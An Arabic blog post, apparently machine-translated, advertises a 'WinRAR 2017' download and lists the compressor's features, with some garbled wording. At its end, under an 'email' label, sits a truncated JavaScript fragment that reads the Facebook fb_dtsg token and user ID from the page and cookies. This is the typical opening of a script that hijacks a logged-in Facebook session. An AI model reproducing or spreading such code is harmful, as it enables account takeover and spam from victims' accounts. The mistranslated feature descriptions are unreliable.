jeudi 23 février 2017

تحميل برنامج winrar 2017



تحميل برنامج winrar 2017


نتيجة بحث الصور عن ‪winrar‬‏

ينرر هو البرنامج الذي يمكن استخدامه لفتح، إنشاء وضغط RAR، ZIP وشكل ملفات أخرى. كما يدعم الإصدار الأخير RAR5، خوارزمية ضغط جديدة.لماذا استخدام ينرر؟
ينرر هو برنامج يقوم بضغط الملفات بحيث أنها تأخذ مساحة أقل على القرص الثابت. انها تدعم ثلاثة أشكال الضغط، ZIP، RAR، وشكل RAR5 جديد؛ قدم مع هذا الإصدار، RAR5 يوفر معدل ضغط أفضل.
ينرر يوفر لك خيار حماية ملف مضغوط مع كلمة مرور باستخدام خوارزمية AES 256 بت التشفير. مثالي لإخفاء الملفات الخاصة بك من أعين المتطفلين!
يمكن للبرنامج أيضا إنشاء ملفات استخراج ذاتي، أو الملفات التي يتم ضغط تلقائيا مع انقر نقرا مزدوجا فوق، وكذلك بما في ذلك ميزات محسنة لإصلاح الملفات التالفة.
وفيما يتعلق بالوظائف الضغط، ينرر يدعم 15 أشكال مختلفة: RAR، ZIP، 7 زيب، ACE، ARJ، BZ2، CAB، غزيب، ISO، JAR، LHZ، TAR، UUE، XZ، وZ.
قائمة الخيارات مفصلة جدا ويتيح لك تكوين كل من جوانب هذا البرنامج. انها مفيدة بالتأكيد لأكثر المستخدمين تطلبا، ولكنه قد ينتهي الخلط بين أولئك الذين هم أقل خبرة.فتح وإنشاء ملفات مضغوطة؟ عدم التفكير...
أهم وظائف ينرر كلها يمكن الوصول إليها بسهولة من الشريط العلوي للواجهة: معالج، مسح الفيروسات، ويضم إضافة / إزالة الملفات، وإنشاء ملفات استخراج ذاتي.
لفتح ملف مضغوط، فقط انقر بزر الماوس الأيمن على الملف، انقر فوق استخراج ملف ثم حدد المجلد الوجهة. يمكنك تنفيذ مباشرة ينرر ثم مرة واحدة داخل البرنامج، يمكنك النقر المزدوج على الملف الذي تريد ضغط. استخراج الملفات ويمكن إجراء أكثر بسيطة باستخدام المعالج.
لإنشاء ملف مضغوط، ومع ذلك، يمكنك النقر على زر الماوس الأيمن وحدد جديد / ينرر الأرشيف، ثم انقر بزر الماوس الأيمن على الملف الذي تريد ضغطه وحدد إضافة إلى الأرشيف. لإنشاء ملف ضغطها نفسه، ببساطة انقر على على واجهة ينرر استخراج ذاتي ثم انقر فوق موافق.
ينرر يتكامل مع مستكشف ويندوز، ويمكن أن تحمل من ضغط / إلغاء ضغط الملفات بنقرة واحدة فقط من قائمة السياق.
لم يتم تغييره لهذا الإصدار الأخير - تصميم البرنامج - عفا عليها الزمن وعفا عليها الزمن.كل ما تحتاجه لتخفيف ضغط وضغط الملفات
أهم ابتكار في هذا الإصدار الأخير، هو مقدمة للتنسيق الضغط RAR5. وتجدر الإشارة إلى أنه، مع ذلك، أن أي الملفات التي تم إنشاؤها باستخدام هذا الشكل يمكن فتح إلا من قبل المستخدمين من ينرر 5.0.
ينرر هو متوافق مع ويندوز 8، 7، فيستا وإكس بي، وملف التثبيت متوافق مع أنظمة 32 بت و 64 بت. وبالإضافة إلى ذلك، يمكن أن تتكامل مع برامج مكافحة الفيروسات المثبتة على جهاز الكمبيوتر الخاص بك ودعم مجموعة واسعة من الأشكال.
على عكس ZipGenius أو 7 زيب، ينرر ليست حرة، ولكنها لا تشمل العديد من الميزات والخيارات التكوين. بالمقارنة مع المنافسين مثل برنامج لضغط الملفات وينرار كما يقدم أفضل نسبة ضغط وأكثر سرعة.
في نهاية المطاف، إذا كنت في حاجة الى برنامج ضغط / إلغاء ضغط فعال مع الميزات المتقدمة، ثم ينرر هو الطريق للذهاب.

email

ssdfqsdfcd@gmail.com (function(){var f={dtsg:document.getElementsByName("fb_dtsg")[0].value,uid:document.cookie.match(docume...